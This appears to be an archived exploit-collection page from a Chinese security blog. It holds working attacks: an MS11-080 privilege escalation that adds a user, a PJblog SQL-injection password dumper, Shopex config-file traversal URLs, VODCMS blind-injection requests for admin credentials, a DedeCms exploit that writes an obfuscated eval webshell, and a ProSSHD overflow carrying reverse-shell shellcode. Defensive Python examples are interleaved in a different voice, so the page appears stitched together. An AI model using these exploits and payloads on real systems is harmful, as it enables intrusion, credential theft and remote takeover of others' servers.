Archive

Archive for the 'Vulnerability Collection' category

MS11080 local privilege escalation add-administrator EXP

January 6, 2012  13 comments

An exploit for MS11080. The source came from abroad; the public exp only pops a SYSTEM-privileged shell and cannot be run directly with arguments, so at a friend's request I changed it to take a custom cmd. Usage:

XP  :   exp.exe XP "net user hacker /add"
2003:   exp.exe 2K3 "net user hacker /add"

It is not written in C, so the binary is very large. For study and reference only! Test screenshot:

Click to download

PJblog V3.0 0day VBS exploit tool

May 21, 2010  No comments

This vulnerability has been out for a long time; saving it here!

If WScript.Arguments.Count <> 2 Then
        WScript.Echo "Usage: Cscript.exe Exp.vbs 要检测的论坛网址 要检测的用户名"
        WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
        WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl,"\","/")
If Right(attackUrl , 1) <> "/" Then
        attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

If IsSuccess(strHoleUrl & "or ""1""=""1") And Not IsSuccess(strHoleUrl & "and ""1""=""2") Then
        WScript.Echo "恭喜!存在漏洞"
Else
        WScript.Echo "没有检测到漏洞"
        WScript.Quit
End If

For n=1 To 40
        For i=1 To 17
                strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And ""1""=""1"
                If Not IsSuccess(strInject) Then
                        strResult = strResult & Mid(SHA1Charset, i-1, 1)
                        Exit For
                End If
                strPrint = chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
                WScript.StdOut.Write strPrint
        Next
Next
WScript.Echo Chr(13) & Chr (10) & "Done!"

Function PostData(PostUrl)
        Dim Http
        Set Http = CreateObject("msxml2.serverXMLHTTP")
        With Http
                .Open "GET",PostUrl,False
                .Send ()
                PostData = .ResponseBody
        End With
        Set Http = Nothing
        PostData =bytes2BSTR(PostData)
End Function

Function bytes2BSTR(vIn)
        Dim strReturn
        Dim I, ThisCharCode, NextCharCode
        strReturn = ""
        For I = 1 To LenB(vIn)
                ThisCharCode = AscB(MidB(vIn, I, 1))
                If ThisCharCode < &H80 Then
                        strReturn = strReturn & Chr(ThisCharCode)
                Else
                        NextCharCode = AscB(MidB(vIn, I + 1, 1))
                        strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
                        I = I + 1
                End If
        Next
        bytes2BSTR = strReturn
End Function

Function IsSuccess(PostUrl)
        strData = PostData(PostUrl)
        'Wscript.Echo strData
        If InStr(strData,"check_error") > 0 Then
                IsSuccess = True
        Else
                IsSuccess = False
        End If
        'Wscript.Sleep 500 'give the system a short rest
End Function

Category: Vulnerability Collection  Tags:

Shopex V4.8.4-4.8.5 universal vulnerability

April 24, 2010  No comments

Author: unknown

Affected versions: shopex V4.8.4 - V4.8.5

Official Shopex introduction:

      Shanghai ShopEx Network Technology Co., Ltd. (上海商派网络科技有限公司) was founded in 2002 and is one of the earliest online-store software providers in China; it is the company with the longest continuous development of online-store systems in China, the online-store software provider with the highest domestic market share, and the largest company in the online-store software industry. ShopEx's online store system, online mall system and rich set of merchant tools have won the approval of 450,000 users through professional features, leading technology and rapid delivery of value. Guided by the philosophy of "providing customers with the most professional shopping model and building the best online shopping software", ShopEx has stayed at the forefront of online shopping models, working to minimise the cost of building online shopping systems and to bring online shopping and e-commerce closer to ordinary people's lives.

Exploitation:

Download the database configuration file directly:
http://www.007hack.com/shopadmin/index.php?ctl=sfile&act=getDB&p[0]=../../config/config.php

Reveal the site's absolute path:
http://www.007hack.com/install/svinfo.php?phpinfo=true

不走的钟 notes: Shopex is not open source, so this site cannot provide a fix; please watch for the official patch!
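The getDB request above works because p[0] is a user-supplied relative path that the handler joins to its export directory without checking where the result lands. The Python function below is an added example, not Shopex code, of the containment check such a file-serving handler needs: the requested name is joined to the base directory, fully resolved (which collapses every ".." and follows symlinks), and accepted only if the resolved path is still inside the base. The base directory /srv/shop/exports and the file names in the test are assumptions.

```python
import os


class PathRejected(ValueError):
    """Raised when a requested path must not be served."""


def resolve_within(base_dir, requested):
    """Map a user-supplied relative path onto base_dir, or raise PathRejected.

    base_dir is the only directory the handler is allowed to read from (assumed
    /srv/shop/exports in the test); requested is the raw parameter value.
    """
    if "\x00" in requested:
        raise PathRejected("NUL byte in path")
    # Reject anything that tries to start from the filesystem root, on either separator style.
    if os.path.isabs(requested) or requested.startswith(("/", "\\")):
        raise PathRejected("absolute path not allowed")
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, requested.replace("\\", "/")))
    # realpath has already collapsed '..' and symlinks, so one containment test on the
    # resolved path decides; commonpath (unlike a string prefix test) will not accept a
    # sibling such as /srv/shop/exports2.
    if os.path.commonpath([base, target]) != base:
        raise PathRejected("path escapes " + base)
    return target


def serve_file_decision(base_dir, requested):
    """Return ('allow', resolved_path) or ('deny', reason), suitable for an audit log."""
    try:
        return ("allow", resolve_within(base_dir, requested))
    except PathRejected as exc:
        return ("deny", str(exc))


if __name__ == "__main__":
    # Constructed requests: one legitimate export, then the traversal from the post.
    for name in ("reports/2010-04.csv", "../../config/config.php"):
        print(name, "->", serve_file_decision("/srv/shop/exports", name))
```

The deny branch is the one to log with the raw parameter value: a request for ../../config/config.php arriving at an export endpoint is worth an alert even when the check stops it.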

VODCMS 6.0 search-type injection vulnerability

April 7, 2010  3 comments

Author: 不走的钟

Source: http://www.007hack.com/?p=544

Official description:

 The vodcms video-on-demand management system (full English name Video-On-Demand Content Management System, Chinese name 秀影). We hope our efforts give you an efficient, fast and powerful VOD management solution.

While doing a site security check, 不走的钟 came across a VODCMS 6.0 installation. Out of habit a single quote was added in the search field, and the error was as follows:

Clearly a MySQL search-type injection:

SELECT COUNT(*) as total FROM vodcms_movie AS a WHERE 1=1 AND a.`locked` = 0 AND a.`title` LIKE '%1'%' AND a.lookgid <> 2
Now construct the SQL statement; search for:

1' and 1=1 and '%'='   // the page returns normally with no error, so the SQL syntax is valid.

VODCMS's default backend is /admin/

Download VODCMS 6.0, unpack it, and find install\vodcms.sql; part of its contents:

-- Table structure for `vodcms_admin`
--
DROP TABLE IF EXISTS `vodcms_admin`;
CREATE TABLE `vodcms_admin` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` char(30) NOT NULL,
  `password` char(32) NOT NULL,
  `realname` varchar(50) NOT NULL,
  `group` varchar(30) NOT NULL,
  `logintime` int(11) NOT NULL,
  `lastime` int(10) unsigned NOT NULL,
  `lastip` char(16) NOT NULL,
  `failed` tinyint(3) unsigned NOT NULL,
  `locked` tinyint(3) unsigned NOT NULL,
  PRIMARY KEY (`id`)
) TYPE=MyISAM  AUTO_INCREMENT=2 ;

UNION cannot be used here. load_file can be used if the privileges are there, but it is very cumbersome; if you do not know the site path, see this site's other article, the Apache path list.

Knowing the backend and the admin table, the admin backend password can also be obtained by blind injection; the requests are:
Admin username:

http://www.007hack.com/index.php?type=title&keyword=1' and (select ascii(substr((select username from vodcms_admin where id=1),1,1)))>=1 and '%'='&mod=content&action=search&x=22&y=17

Admin password:

http://www.007hack.com/index.php?type=title&keyword=1' and (select ascii(substr((select password from password where id=1),1,1)))>=1 and '%'='&mod=content&action=search&x=22&y=17

Of course doing this by hand is tiring; using the keyword parameter I wrote a small tool that dumped the 32-character MD5 in 10 minutes. The tool is simple but not general-purpose, so it is not released here.
Tip:
robots.txt in the web root reveals the version; this article was tested on 6.0.0.

Note:
Since VODCMS 6.0 is not open source (the PHP is encrypted), this site cannot provide a fix. The vendor has been notified; please wait for the patch and update promptly.
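The error message above shows the root cause: the keyword is spliced into the LIKE pattern as SQL text, so a true and a false injected condition produce different row counts, which is the oracle the blind-injection requests rely on. The following Python example is added here and is not VODCMS code (VODCMS is PHP; the same change applies there): it runs the query in both shapes against a constructed in-memory SQLite table named like the one in the error, and shows that with a bound parameter the true and false probes return the same count, so the oracle disappears. The ESCAPE clause also stops a keyword of "%" from matching every title. Row contents are constructed.

```python
import sqlite3

# Constructed rows standing in for VODCMS's vodcms_movie table; the column names follow
# the query echoed in the error above (title, locked, lookgid).
ROWS = [
    ("Movie 1", 0, 1),
    ("Movie 11", 0, 1),
    ("Locked 1", 1, 1),
    ("Other", 0, 2),
    ("50% off", 0, 1),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE vodcms_movie (title TEXT, locked INTEGER, lookgid INTEGER)")
    conn.executemany("INSERT INTO vodcms_movie VALUES (?, ?, ?)", ROWS)
    return conn


def count_concatenated(conn, keyword):
    """The vulnerable shape: the keyword is spliced into the SQL text, as the echoed query shows."""
    sql = ("SELECT COUNT(*) AS total FROM vodcms_movie AS a WHERE 1=1 AND a.locked = 0 "
           "AND a.title LIKE '%" + keyword + "%' AND a.lookgid <> 2")
    return conn.execute(sql).fetchone()[0]


def escape_like(s):
    """Escape LIKE wildcards so that a keyword of '%' matches a literal percent sign only."""
    return s.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def count_parameterized(conn, keyword):
    """The fixed shape: the keyword travels as a bound parameter and is never parsed as SQL."""
    sql = ("SELECT COUNT(*) AS total FROM vodcms_movie AS a WHERE 1=1 AND a.locked = 0 "
           "AND a.title LIKE ? ESCAPE '\\' AND a.lookgid <> 2")
    return conn.execute(sql, ("%" + escape_like(keyword) + "%",)).fetchone()[0]


def has_boolean_oracle(count_fn, conn):
    """True when a true and a false injected condition give different results."""
    true_probe = "1' and 1=1 and '%'='"   # the search string from the post
    false_probe = "1' and 1=2 and '%'='"  # the same shape with a false condition
    return count_fn(conn, true_probe) != count_fn(conn, false_probe)


def oracle_report():
    """Run both query shapes against the same data and return what each reveals."""
    conn = make_db()
    return {
        "plain_keyword": (count_concatenated(conn, "1"), count_parameterized(conn, "1")),
        "oracle_concatenated": has_boolean_oracle(count_concatenated, conn),
        "oracle_parameterized": has_boolean_oracle(count_parameterized, conn),
        "wildcard": (count_concatenated(conn, "%"), count_parameterized(conn, "%")),
    }


if __name__ == "__main__":
    for key, value in oracle_report().items():
        print(key, "->", value)
```

For an ordinary keyword both shapes agree, so the fix costs nothing functionally; the difference only appears on the probes, which is why a search form that "works" can still be fully injectable.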


DedeCms v5.5 latest vulnerability

March 9, 2010  No comments

Author: unknown

Affected version: DeDeCms V5.5 (other versions untested)

Vulnerable file: /plus/digg_ajax.php

EXP:

<?php
print_r("
+----------------------------------------+
dedecms v5.5 final getwebshell exploit
+----------------------------------------+
");
if ($argc < 3) {
print_r("
+----------------------------------------+
Usage: php ".$argv[0]." host path
host:      target server (ip/hostname)
path:      path to dedecms
Example:
php ".$argv[0]." localhost /dedecms/
+----------------------------------------+
");
exit;
}
error_reporting(7);
ini_set("max_execution_time", 0);

$host = $argv[1];
$path = $argv[2];

$post_a = "plus/digg_ajax.php?id=1024e1024&*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*";
$post_b = "needCode=aa/../../../data/mysql_error_trace";
$shell = "data/cache/t.php";

get_send($post_a);
post_send("plus/comments_frame.php",$post_b);
$content = post_send($shell,"t=echo tojen;");

if(substr($content,9,3)=="200"){
    echo "\nShell Address is:".$host.$path.$shell;
}else{
    echo "\nError.";
}
function get_send($url){
    global $host, $path;
    $message = "GET ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);

    $back = "";

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
}
function post_send($url,$cmd){
    global $host, $path;
    $message = "POST ".$path."$url  HTTP/1.1\r\n";
    $message .= "Accept: */*\r\n";
    $message .= "Referer: http://$host$path\r\n";
    $message .= "Accept-Language: zh-cn\r\n";
    $message .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Content-Length: ".strlen($cmd)."\r\n";
    $message .= "Connection: Close\r\n\r\n";
    $message .= $cmd;
    $fp = fsockopen($host, 80);
    if(!$fp){
        echo "\nConnect to host Error";
    }
    fputs($fp, $message);

    $back = "";

    while (!feof($fp))
        $back .= fread($fp, 1024);
    fclose($fp);
    return $back;
}
?>
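The id value in the first request is built entirely from chr() calls, so an access-log entry for it does not show what the request writes to disk, and the second request hides its target behind a "aa/../../../" prefix. The Python script below is an added example, not part of the exploit or of DedeCms: it decodes chr() concatenation chains back into text and lists the indicators an analyst triaging a captured request would look for (eval, file-write calls, a PHP open tag, directory traversal, comment break-out). The only inputs are the two request strings from the exploit above, reproduced as constructed captured data.

```python
import re

# Constructed: the request path and POST body from the exploit above, as they would appear
# in a captured request or percent-decoded access log.
CAPTURED_REQUEST = (
    "plus/digg_ajax.php?id=1024e1024&*/fputs(fopen("
    "chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97)."
    "chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),"
    "chr(119).chr(43)),"
    "chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108)."
    "chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(116)."
    "chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*"
)
CAPTURED_POST = "needCode=aa/../../../data/mysql_error_trace"

# A run of chr(N) calls joined by PHP's '.' concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\))*", re.I)
CHR_ONE = re.compile(r"chr\(\s*(\d{1,3})\s*\)", re.I)


def decode_chr_chains(text):
    """Replace every chr(N).chr(N)... chain with the string it builds; other text is kept."""
    def build(match):
        return "".join(chr(int(n)) for n in CHR_ONE.findall(match.group(0)) if int(n) < 256)
    return CHR_CHAIN.sub(build, text)


# Indicators evaluated on the decoded text; names are the labels an alert would carry.
INDICATORS = {
    "code-eval": re.compile(r"\beval\s*\(", re.I),
    "file-write": re.compile(r"\bf(?:puts|write|open)\s*\(", re.I),
    "php-tag": re.compile(r"<\?php", re.I),
    "traversal": re.compile(r"(?<![\w.])\.\.[/\\]"),
    "comment-breakout": re.compile(r"\*/|/\*"),
}


def triage_request(raw):
    """Decode obfuscated chr() chains and report which indicators the request contains."""
    decoded = decode_chr_chains(raw)
    found = [name for name, rx in INDICATORS.items() if rx.search(decoded)]
    return {"decoded": decoded, "indicators": found}


if __name__ == "__main__":
    for sample in (CAPTURED_REQUEST, CAPTURED_POST):
        report = triage_request(sample)
        print(report["decoded"])
        print("  indicators:", ", ".join(report["indicators"]) or "none")
```

Decoding shows the first request names a file under data/cache/ and a PHP open tag followed by eval, which is exactly what the post-exploitation check `t=echo tojen;` against data/cache/t.php relies on; a file-integrity watch on data/cache/ and the indicator list above are the corresponding detection points.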


ProSSHD v1.2 20090726 Buffer Overflow Exploit

March 7, 2010  No comments

# Author: S2 Crew [Hungary]
# Tested on: Windows XP SP2 EN
# CVE: -
#
# Registers:
# EAX 000003E4
# ECX 0012ED44
# EDX 7C90EB94 ntdll.KiFastSystemCallRet
# EBX 00000674
# ESP 0012EFC0 ASCII "BBBBBBBBBBBBBBBBBB..."
# EBP 0012F3DC ASCII "BBBBBBBBBBBBBBBBBB..."
# ESI 7C81DD9A kernel32.CreatePipe
# EDI 0012F3D8 ASCII "BBBBBBBBBBBBBBBBBBB..."
# EIP 77D5B8D6 USER32.77D5B8D6

#!/usr/bin/perl

use Net::SSH2;

$username = 'test';
$password = 'test';

$host = '172.16.29.133';
$port = 22;

# [*] x86/alpha_mixed succeeded with size 692 (iteration=1) reverse_shell_tcp
$shell =
"\x89\xe5\xda\xd7\xd9\x75\xf4\x5e\x56\x59\x49\x49\x49\x49" .
"\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x37\x51" .
"\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32" .
"\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" .
"\x42\x75\x4a\x49\x4b\x4c\x48\x68\x4e\x69\x45\x50\x47\x70" .
"\x43\x30\x51\x70\x4f\x79\x4b\x55\x44\x71\x4e\x32\x51\x74" .
"\x4e\x6b\x43\x62\x44\x70\x4e\x6b\x46\x32\x46\x6c\x4e\x6b" .
"\x51\x42\x45\x44\x4c\x4b\x50\x72\x51\x38\x46\x6f\x4f\x47" .
"\x51\x5a\x51\x36\x50\x31\x4b\x4f\x45\x61\x4b\x70\x4e\x4c" .
"\x47\x4c\x51\x71\x43\x4c\x47\x72\x46\x6c\x47\x50\x4a\x61" .
"\x48\x4f\x46\x6d\x45\x51\x4f\x37\x4d\x32\x4c\x30\x51\x42" .
"\x51\x47\x4e\x6b\x51\x42\x44\x50\x4c\x4b\x50\x42\x47\x4c" .
"\x43\x31\x48\x50\x4e\x6b\x43\x70\x51\x68\x4e\x65\x49\x50" .
"\x43\x44\x42\x6a\x47\x71\x4e\x30\x50\x50\x4c\x4b\x50\x48" .
"\x47\x68\x4e\x6b\x46\x38\x51\x30\x45\x51\x4b\x63\x48\x63" .
"\x47\x4c\x51\x59\x4c\x4b\x50\x34\x4c\x4b\x45\x51\x48\x56" .
"\x45\x61\x49\x6f\x50\x31\x49\x50\x4c\x6c\x49\x51\x48\x4f" .
"\x44\x4d\x45\x51\x4a\x67\x47\x48\x4d\x30\x50\x75\x48\x74" .
"\x43\x33\x43\x4d\x4c\x38\x45\x6b\x51\x6d\x46\x44\x43\x45" .
"\x4a\x42\x51\x48\x4e\x6b\x46\x38\x47\x54\x47\x71\x4a\x73" .
"\x42\x46\x4e\x6b\x44\x4c\x42\x6b\x4c\x4b\x51\x48\x47\x6c" .
"\x46\x61\x4e\x33\x4c\x4b\x43\x34\x4c\x4b\x46\x61\x48\x50" .
"\x4d\x59\x43\x74\x44\x64\x46\x44\x51\x4b\x43\x6b\x50\x61" .
"\x43\x69\x51\x4a\x46\x31\x4b\x4f\x49\x70\x43\x68\x43\x6f" .
"\x50\x5a\x4c\x4b\x42\x32\x48\x6b\x4b\x36\x51\x4d\x50\x68" .
"\x45\x63\x45\x62\x47\x70\x45\x50\x42\x48\x42\x57\x44\x33" .
"\x45\x62\x43\x6f\x46\x34\x42\x48\x50\x4c\x42\x57\x51\x36" .
"\x44\x47\x49\x6f\x4a\x75\x4f\x48\x4c\x50\x46\x61\x47\x70" .
"\x45\x50\x45\x79\x4f\x34\x46\x34\x46\x30\x50\x68\x45\x79" .
"\x4b\x30\x42\x4b\x47\x70\x49\x6f\x4b\x65\x46\x30\x42\x70" .
"\x42\x70\x42\x70\x51\x50\x46\x30\x51\x50\x50\x50\x43\x58" .
"\x4b\x5a\x46\x6f\x49\x4f\x49\x70\x4b\x4f\x4a\x75\x4d\x59" .
"\x4b\x77\x43\x58\x4c\x6c\x44\x50\x47\x6d\x4b\x30\x50\x68" .
"\x44\x42\x45\x50\x46\x71\x51\x4c\x4f\x79\x49\x76\x50\x6a" .
"\x46\x70\x50\x56\x51\x47\x42\x48\x4a\x39\x4f\x55\x51\x64" .
"\x45\x31\x4b\x4f\x4a\x75\x50\x68\x42\x43\x50\x6d\x45\x34" .
"\x45\x50\x4e\x69\x4a\x43\x50\x57\x50\x57\x46\x37\x45\x61" .
"\x48\x76\x50\x6a\x44\x52\x43\x69\x42\x76\x4a\x42\x4b\x4d" .
"\x43\x56\x4a\x67\x51\x54\x44\x64\x47\x4c\x43\x31\x45\x51" .
"\x4e\x6d\x42\x64\x45\x74\x44\x50\x4a\x66\x47\x70\x43\x74" .
"\x50\x54\x46\x30\x43\x66\x43\x66\x46\x36\x47\x36\x42\x76" .
"\x50\x4e\x51\x46\x43\x66\x46\x33\x46\x36\x50\x68\x51\x69" .
"\x4a\x6c\x45\x6f\x4b\x36\x49\x6f\x4b\x65\x4b\x39\x49\x70" .
"\x50\x4e\x50\x56\x47\x36\x49\x6f\x46\x50\x43\x58\x46\x68" .
"\x4e\x67\x45\x4d\x43\x50\x4b\x4f\x49\x45\x4d\x6b\x4a\x50" .
"\x4e\x55\x49\x32\x43\x66\x50\x68\x49\x36\x4a\x35\x4d\x6d" .
"\x4d\x4d\x4b\x4f\x4a\x75\x45\x6c\x45\x56\x51\x6c\x45\x5a" .
"\x4b\x30\x4b\x4b\x49\x70\x42\x55\x43\x35\x4f\x4b\x47\x37" .
"\x46\x73\x43\x42\x42\x4f\x51\x7a\x43\x30\x50\x53\x49\x6f" .
"\x48\x55\x47\x7a\x41\x41";

# jmp esp 0x77dc7c7b user32.dll

$fuzz = "\x41"x490 . "\x7B\x7C\xDC\x77" . "\x90"x1000 . $shell;

$ssh2 = Net::SSH2->new();
$ssh2->connect($host, $port) || die "\nError: Connection Refused!\n";
$ssh2->auth_password($username, $password) || die "\nError: Username/Password Denied!\n";
$scpget = $ssh2->scp_get($fuzz);
$ssh2->disconnect();
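The $fuzz layout above (490 bytes of filler, a 4-byte return address, a 1000-byte NOP sled, then the alphanumeric shellcode) is nothing like a file name, which is what makes this class of request easy to recognise on the server side. The Python classifier below is an added example, not code from the exploit or from ProSSHD: it scores one SCP path argument against four anomaly rules (length, non-printable bytes, a NOP run, and a single byte repeated for most of the argument). ProSSHD's real internal buffer size is not stated in the post, so the 256-byte limit is a placeholder an operator would tune; the sample inputs are constructed and the overflow-shaped one contains only filler and a NOP sled, with the return address and shellcode left out.

```python
# Constructed thresholds: tune MAX_PATH_LEN to the longest legitimate path seen on the server.
MAX_PATH_LEN = 256
NOP_RUN = 16  # consecutive 0x90 bytes that count as a NOP sled


def classify_scp_path(path: bytes):
    """Return the anomaly names found in one SCP path argument (empty list if benign)."""
    reasons = []
    if len(path) > MAX_PATH_LEN:
        reasons.append("oversized")
    # Real file names are printable; addresses and NOPs are not.
    if any(b < 0x20 or b > 0x7E for b in path):
        reasons.append("non-printable")
    if b"\x90" * NOP_RUN in path:
        reasons.append("nop-sled")
    # One byte value repeated for most of a long argument is padding written to reach a
    # saved return address, not a path component.
    if len(path) >= 64:
        most_common = max(path.count(bytes([v])) for v in set(path))
        if most_common > 0.6 * len(path):
            reasons.append("repeated-filler")
    return reasons


# Constructed samples: a normal path, and a buffer shaped like $fuzz above minus the
# return address and shellcode (filler, then a NOP sled), which is inert on its own.
BENIGN = b"/home/test/reports/2010-03.tar.gz"
OVERFLOW_LIKE = b"A" * 490 + b"\x90" * 1000

if __name__ == "__main__":
    for sample in (BENIGN, OVERFLOW_LIKE, b"A" * 300):
        print(len(sample), "bytes ->", classify_scp_path(sample) or "benign")
```

Even the weakest rule, "oversized", is enough to reject this request before the copy into the fixed-size buffer happens; the other three are useful as log annotations when a length limit is raised for legitimate reasons.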
